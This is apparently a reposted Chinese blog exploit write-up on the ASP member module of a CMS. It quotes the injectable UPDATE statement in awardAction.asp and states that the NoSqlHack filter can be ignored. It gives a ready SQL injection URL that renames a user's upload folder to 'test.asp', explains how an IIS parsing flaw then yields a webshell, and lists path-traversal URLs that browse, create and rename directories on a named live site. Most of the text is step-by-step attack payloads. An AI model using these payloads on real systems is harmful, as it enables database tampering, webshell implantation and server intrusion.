在文件\User\award\awardAction.asp中:
Integral=NoSqlHack(request.QueryString("Integral"))
if action="join" then
User_Conn.execute("Insert into FS_ME_User_Prize (prizeid,usernumber,awardID) values("&CintStr(prizeID)&",'"&session("FS_UserNumber")&"',"&CintStr(awardID)&")")
'获得当前参加人数--------------------------------
User_Conn.execute("Update FS_ME_Users set Integral=(Integral-"&Integral&") where usernumber='"&session("FS_UserNumber")&"'")
请直接无视NoSqlHack,由于sql注入是发生在update语句中,所以我们可以修改表S_ME_Users的任意记录的任意字段信息
webshell还可以用来代替access
我们文件管理中上传个图片文件:
http://192.168.1.101/UserFiles/27015564I69/2013_09_27_01_10_0390446.jpg
UserNumber就是等于27015564I69
通过以上的sql注入漏洞,直接update为test.asp
http://192.168.1.101/User/award/awardAction.asp?action=join&awardID=1&prizeID=1&Integral=1),UserNumber=0x74006500730074002E00610073007000,sex=(1
退出再重新登录
生成test.asp目录,后续上传的文件都会保存在该文件中
利用iis解析漏洞获取webshell
漏洞证明:
同时文件管理连接
先注册用户名登录我后执行下边的命令就可以了
1 游览目录文件
http://www.2cto.com/User/CommPages/FolderImageList.asp?CurrPath=/admin/
2 创建一个目录
http://www.2cto.com/User/CommPages/FolderImageList.asp?CurrPath=/123456/
3 修改一个目录名称
http://www.2cto.com/User/FileManage.asp?Type=FolderReName&OldFileName=../../123456&NewFileName=654321
转载于:https://blog.51cto.com/0daysec/1585359
1402
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
